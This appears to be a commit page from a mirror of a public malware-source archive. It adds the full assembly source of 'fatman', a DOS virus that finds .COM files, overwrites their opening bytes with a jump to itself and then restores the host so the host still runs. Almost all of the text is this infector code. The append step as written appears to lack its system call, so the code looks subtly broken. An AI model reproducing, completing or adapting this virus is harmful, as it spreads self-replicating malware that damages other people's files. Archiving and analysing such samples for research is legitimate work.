daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:41:47 -06:00
committed by GitHub
parent 06c1f4dfdd
commit dc888afe59
99 changed files with 42193 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.fatman.asm
+81
View File
@@ -0,0 +1,81 @@
code segment'code'
assume cs:code, ds:code, ss:code, es:code
org 100h
dta equ endcode + 10
fatmanid equ 34
start:
jmp virus
hoststart:
db 90h,90h,90h ;NOP
db 0cdh,020h,1ah,1ah ;INT 20
hostend:
virus:
call $ + 2
fatman:
pop bp ;Search for next files
sub bp,offset fatman
mov ah,1ah
lea dx,[bp +dta]
int 21h
mov ah,4eh
lea dx,[bp + filespec]
xor cx,cx
fileloop:
int 21h
jc quit
mov ax,3d02h ;Open file read and write
lea dx,[bp + offset dta + 30] ;Move the offset of filename
int 21h ;into dx register
jc quit
xchg bx,ax
mov ah,3fh ;read from file
mov cx,4 ;read 4 bytes off file
lea dx,[bp + orgjmp] ;store the 4 bytes
int 21h
mov ax,4202h ;point to end of file
xor cx,cx
xor dx,dx
int 21h
sub ax,03h ;Back three bytes from org
mov [bp + newjmp + 2], ah ;high location
mov [bp + newjmp + 1], al ;low location
mov [bp + newjmp + 3], fatmanid;his ID
mov ah,0e9h ;JMP
mov [bp + newjmp],ah
mov ah,40h ;write to file
mov cx,endcode - virus
lea dx,[bp + virus]
jc quit
mov ax,4200h ;Moving to TOP of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;writing 4 bytes to top of file
mov cx,4
lea dx,[bp + offset newjmp]
int 21h
mov ah,1ah
mov dx,080h
int 21h
quit:
lea si,[bp + offset thisjmp]
mov di,0100h
mov cx,04h
cld
rep movsb
mov di,0100h
jmp di
filespec db '*.COM',0
orgjmp db 4 dup (?)
newjmp db 4 dup (?)
thisjmp db 4 dup (?)
oldjmp db 09h,0cdh,020h,90h
endcode:
code ends
end start